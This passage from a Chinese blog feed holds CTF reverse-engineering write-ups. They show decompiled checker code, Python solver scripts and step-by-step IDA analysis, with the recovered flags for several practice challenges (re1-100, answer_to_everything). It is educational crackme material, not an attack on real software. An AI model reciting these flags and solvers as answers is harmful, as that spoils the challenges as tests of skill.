class="number">23</span>]=add_401000(v97, <span class="number">48</span>)</span><br><span class="line">v98 = add_401000(flag[<span class="number">24</span>], <span class="number">1</span>)</span><br><span class="line">v99 = add_401000(v98, <span class="number">3</span>)</span><br><span class="line">v100 = add_401000(v99, <span class="number">3</span>)</span><br><span class="line">v101 = add_401000(v100, <span class="number">3</span>)</span><br><span class="line">v102 = add_401000(v101, <span class="number">6</span>)</span><br><span class="line">v103 = add_401000(v102, <span class="number">6</span>)</span><br><span class="line">v104 = add_401000(v103, <span class="number">6</span>)</span><br><span class="line">flag[<span class="number">24</span>]=add_401000(v104, <span class="number">20</span>)</span><br><span class="line">v105 = add_401000(flag[<span class="number">25</span>], <span class="number">55</span>)</span><br><span class="line">v106 = sub_401220(v105, <span class="number">33</span>)</span><br><span class="line">v107 = add_401000(v106, <span class="number">44</span>)</span><br><span class="line">v108 = sub_401220(v107, <span class="number">11</span>)</span><br><span class="line">flag[<span class="number">25</span>]=add_401000(v108, <span class="number">42</span>)</span><br><span class="line">flag[<span class="number">26</span>]=add_401000(flag[<span class="number">26</span>], flag[<span class="number">25</span>])</span><br><span class="line">flag[<span class="number">27</span>]=add_401000(flag[<span class="number">27</span>], flag[<span class="number">12</span>])</span><br><span class="line">v109 = flag[<span class="number">27</span>]</span><br><span class="line">v110 = sub_401220(flag[<span class="number">28</span>], <span class="number">1</span>)</span><br><span class="line">v111 = add_401000(v110, v109)</span><br><span class="line">flag[<span class="number">28</span>]=sub_401220(v111, <span class="number">1</span>)</span><br><span class="line">v112 = flag[<span class="number">23</span>]</span><br><span class="line">v113 = sub_401220(flag[<span class="number">29</span>], <span class="number">1</span>)</span><br><span class="line">v114 = mul_401100(v113, <span class="number">1000000</span>)</span><br><span class="line">flag[<span class="number">29</span>]=add_401000(v114, v112)</span><br><span class="line">v115 = flag[<span class="number">27</span>]</span><br><span class="line">v116 = add_401000(flag[<span class="number">30</span>], <span class="number">1</span>)</span><br><span class="line">flag[<span class="number">30</span>]=mul_401100(v116, v115)</span><br><span class="line">flag[<span class="number">31</span>]=add_401000(flag[<span class="number">31</span>], flag[<span class="number">30</span>])</span><br><span class="line">print(<span class="string">"CTF{"</span>+<span class="string">''</span>.join(map(chr,flag))+<span class="string">"}"</span>)</span><br></pre></td></tr></table></figure></div><h3 id="re1-100"><a href="#re1-100" class="headerlink" title="re1-100"></a>re1-100</h3><p>这题竟然放在了高手区</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"> <span class="number">1</span> <span class="keyword">if</span> ( numRead )</span><br><span class="line"> <span class="number">2</span> {</span><br><span class="line"> <span class="number">3</span> <span class="keyword">if</span> ( childCheckDebugResult() )</span><br><span class="line"> <span class="number">4</span> {</span><br><span class="line"> <span class="number">5</span> responseFalse();</span><br><span class="line"> <span class="number">6</span> }</span><br><span class="line"> <span class="number">7</span> <span class="keyword">else</span> <span class="keyword">if</span> ( bufParentRead[<span class="number">0</span>] == ‘{‘ ) // 第一位</span><br><span class="line"> <span class="number">8</span> {</span><br><span class="line"> <span class="number">9</span> <span class="keyword">if</span> ( strlen(bufParentRead) == <span class="number">42</span> ) // 输入的长度为<span class="number">42</span>d</span><br><span class="line"><span class="number">10</span> {</span><br><span class="line"><span class="number">11</span> <span class="keyword">if</span> ( !strncmp(&bufParentRead[<span class="number">1</span>], <span class="string">"53fc275d81"</span>, <span class="number">0xA</span>uLL) )// 输入的<span class="number">1</span><span class="number">-10</span>位(输入的第<span class="number">2</span>位到第<span class="number">11</span>位)</span><br><span class="line"><span class="number">12</span> {</span><br><span class="line"><span class="number">13</span> <span class="keyword">if</span> ( bufParentRead[strlen(bufParentRead) - <span class="number">1</span>] == ‘}‘ )// 最后一位</span><br><span class="line"><span class="number">14</span> {</span><br><span class="line"><span class="number">15</span> <span class="keyword">if</span> ( !strncmp(&bufParentRead[<span class="number">31</span>], <span class="string">"4938ae4efd"</span>, <span class="number">0xA</span>uLL) )// 输入的<span class="number">31</span><span class="number">-40</span>位</span><br><span class="line"><span class="number">16</span> {</span><br><span class="line"><span class="number">17</span> <span class="keyword">if</span> ( !confuseKey(bufParentRead, <span class="number">42</span>) )//关键</span><br><span class="line"><span class="number">18</span> {</span><br><span class="line"><span class="number">19</span> responseFalse();</span><br><span class="line"><span class="number">20</span> }</span><br><span class="line"><span class="number">21</span> <span class="keyword">else</span> <span class="keyword">if</span> ( !strncmp(bufParentRead, <span class="string">"{daf29f59034938ae4efd53fc275d81053ed5be8c}"</span>, <span class="number">0x2A</span>uLL) )// 修改后的结果进行比较</span><br><span class="line"><span class="number">22</span> {</span><br><span class="line"><span class="number">23</span> responseTrue(); // {<span class="number">53</span>fc275d81053ed5be8cdaf29f59034938ae4efd}</span><br><span class="line"><span class="number">24</span> }</span><br><span class="line"><span class="number">25</span> <span class="keyword">else</span></span><br><span class="line"><span class="number">26</span> {</span><br><span class="line"><span class="number">27</span> responseFalse();</span><br></pre></td></tr></table></figure></div><p>主要分析confuseKey(bufParentRead, 42)函数</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="number">1</span> bool __cdecl confuseKey(char *szKey, int iKeyLength)</span><br><span class="line"> <span class="number">2</span> {</span><br><span class="line"> <span class="number">3</span> char szPart1[<span class="number">15</span>]; // [rsp+<span class="number">10</span>h] [rbp<span class="number">-50</span>h]</span><br><span class="line"> <span class="number">4</span> char szPart2[<span class="number">15</span>]; // [rsp+<span class="number">20</span>h] [rbp<span class="number">-40</span>h]</span><br><span class="line"> <span class="number">5</span> char szPart3[<span class="number">15</span>]; // [rsp+<span class="number">30</span>h] [rbp<span class="number">-30</span>h]</span><br><span class="line"> <span class="number">6</span> char szPart4[<span class="number">15</span>]; // [rsp+<span class="number">40</span>h] [rbp<span class="number">-20</span>h]</span><br><span class="line"> <span class="number">7</span> unsigned __int64 v7; // [rsp+<span class="number">58</span>h] [rbp<span class="number">-8</span>h]</span><br><span class="line"> <span class="number">8</span> </span><br><span class="line"> <span class="number">9</span> v7 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"><span class="number">10</span> *(_QWORD *)szPart1 = <span class="number">0L</span>L;</span><br><span class="line"><span class="number">11</span> *(_DWORD *)&szPart1[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">12</span> *(_WORD *)&szPart1[<span class="number">12</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">13</span> szPart1[<span class="number">14</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">14</span> *(_QWORD *)szPart2 = <span class="number">0L</span>L;</span><br><span class="line"><span class="number">15</span> *(_DWORD *)&szPart2[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">16</span> *(_WORD *)&szPart2[<span class="number">12</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">17</span> szPart2[<span class="number">14</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">18</span> *(_QWORD *)szPart3 = <span class="number">0L</span>L;</span><br><span class="line"><span class="number">19</span> *(_DWORD *)&szPart3[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">20</span> *(_WORD *)&szPart3[<span class="number">12</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">21</span> szPart3[<span class="number">14</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">22</span> *(_QWORD *)szPart4 = <span class="number">0L</span>L;</span><br><span class="line"><span class="number">23</span> *(_DWORD *)&szPart4[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">24</span> *(_WORD *)&szPart4[<span class="number">12</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">25</span> szPart4[<span class="number">14</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="number">26</span> <span class="keyword">if</span> ( iKeyLength != <span class="number">42</span> )</span><br><span class="line"><span class="number">27</span> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"><span class="number">28</span> <span class="keyword">if</span> ( !szKey )</span><br><span class="line"><span class="number">29</span> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"><span class="number">30</span> <span class="keyword">if</span> ( strlen(szKey) != <span class="number">42</span> )</span><br><span class="line"><span class="number">31</span> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"><span class="number">32</span> <span class="keyword">if</span> ( *szKey != <span class="number">123</span> )</span><br><span class="line"><span class="number">33</span> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"><span class="number">34</span> strncpy(szPart1, szKey + <span class="number">1</span>, <span class="number">0xA</span>uLL); // 将输入去掉头尾{}后的部分分成<span class="number">4</span>部分</span><br><span class="line"><span class="number">35</span> strncpy(szPart2, szKey + <span class="number">11</span>, <span class="number">0xA</span>uLL);</span><br><span class="line"><span class="number">36</span> strncpy(szPart3, szKey + <span class="number">21</span>, <span class="number">0xA</span>uLL);</span><br><span class="line"><span class="number">37</span> strncpy(szPart4, szKey + <span class="number">31</span>, <span class="number">0xA</span>uLL);</span><br><span class="line"><span class="number">38</span> memset(szKey, <span class="number">0</span>, iKeyLength);</span><br><span class="line"><span class="number">39</span> *szKey = ‘{‘;</span><br><span class="line"><span class="number">40</span> strcat(szKey, szPart3); // 分割后的部分重新组合</span><br><span class="line"><span class="number">41</span> strcat(szKey, szPart4);</span><br><span class="line"><span class="number">42</span> strcat(szKey, szPart1);</span><br><span class="line"><span class="number">43</span> strcat(szKey, szPart2);</span><br><span class="line"><span class="number">44</span> szKey[<span class="number">41</span>] = ‘}‘;</span><br><span class="line"><span class="number">45</span> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"><span class="number">46</span> }</span><br></pre></td></tr></table></figure></div><p>exp</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"> <span class="number">1</span> s1=‘<span class="number">53</span>fc275d81‘</span><br><span class="line"> <span class="number">2</span> s4=‘<span class="number">4938</span>ae4efd‘</span><br><span class="line"> <span class="number">3</span> <span class="comment"># 3,4,1,2</span></span><br><span class="line"> <span class="number">4</span> ss=‘daf29f59034938ae4efd53fc275d81053ed5be8c‘</span><br><span class="line"> <span class="number">5</span> x=[]</span><br><span class="line"> <span class="number">6</span> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(ss),<span class="number">10</span>):</span><br><span class="line"> <span class="number">7</span> x.append(ss[i:i+<span class="number">10</span>])</span><br><span class="line"> <span class="number">8</span> print(x)</span><br><span class="line"> <span class="number">9</span> print(‘{‘,‘‘.join((x[<span class="number">2</span>],x[<span class="number">3</span>],x[<span class="number">0</span>],x[<span class="number">1</span>])),‘}‘,sep=‘‘)</span><br><span class="line"><span class="number">10</span> </span><br><span class="line"><span class="number">11</span> <span class="comment"># [‘daf29f5903‘, ‘4938ae4efd‘, ‘53fc275d81‘, ‘053ed5be8c‘]</span></span><br><span class="line"><span class="number">12</span> <span class="comment"># {53fc275d81053ed5be8cdaf29f59034938ae4efd}</span></span><br></pre></td></tr></table></figure></div><h3 id="answer-to-everything"><a href="#answer-to-everything" class="headerlink" title="answer_to_everything"></a>answer_to_everything</h3><p>main.exe 打开</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/ZgdqkAlDfn6BzaU.png" alt="image-20201124165527869" title=""> </div> <div class="image-caption">image-20201124165527869</div> </figure><p>查壳</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/WGXUNMlDhTC7Ize.png" alt="image-20201124165540233" title=""> </div> <div class="image-caption">image-20201124165540233</div> </figure><p>不是有效的PE文件 即不是window 平台运行的软件 猜测是linux</p><p>将main.exe拖入ida 32</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/jeGKvH38PM9Rstk.png" alt="image-20201124165553289" title=""> </div> <div class="image-caption">image-20201124165553289</div> </figure><p>得到信息 ELF64 for x86-64 elf即代表是在linux下运行的软件 64 代表 ida 32 分析不了这个 程序 得用ida 64 分析</p><p>所以现在拖入linux里 (ubuntu 64)</p><p>打开终端</p><p>然后查看 main.exe的权限 ls -a main.exe 然后显示</p><p>chmod a+x main.exe//变为可执行 //如果权限不够的话执行改命令 发现 -rwxrwxrwx此时有权限执行main.exe</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/DyRfGWwqYSgT5r8.png" alt="000000" title=""> </div> <div class="image-caption">000000</div> </figure><p>然后输入命令 ./main.exe</p><p>显示</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/7lMsi9b5hAkImaY.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>然后随便输入</p><p>然后提示 YOUSUCK//你真笨 猜测 这个程序 先输出一句话 Gimme 然后又输入东西 错误的话 输出 YOUFUCK 正确的话 输出我们想要的信息</p><p>接下来 将main.exe 拖入ida 64 查找 关键字符串 Gimme//因为很少直接看到了就不用再搜索了</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="C:\Users\大仑子\AppData\Roaming\Typora\typora-user-images\image-20201124165640832.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>双击 进去与之对应的代码段 可以看到</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/gCFncUVdo5TWH9l.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>然后敲击键盘上的x键可查看那几个引用它了 敲击 X 键</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/CU3whqfL6gejQJr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>点进去为一个函数<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/Yw7mEX3rq2P1WjF.png" alt="" title=""> </div> <div class="image-caption"></div> </figure></p><p>tab 反汇编</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/DixtsoMBdc6PXKG.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>即明白了 我们在linux中应该输入42</p><p>然后他输出 Cipher from Bill \nSubmit without any tags\n#kdudpeh 猜测 kdudpeh 是我们想要的flag ISCC{kdudpeh} 提交错误 看题目注意到 sha1 以为是 sha1碰撞 后来发现是 shi1加密 获得flag为: <code>flag{80ee2a3fe31da904c596d993f7f1de4827c1450a}</code></p>]]></content>
<summary type="html">
<h2 id="实验课写写之前做过的题叭"><a href="#实验课写写之前做过的题叭" class="headerlink" title="实验课写写之前做过的题叭"></a>实验课写写之前做过的题叭</h2>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
</feed>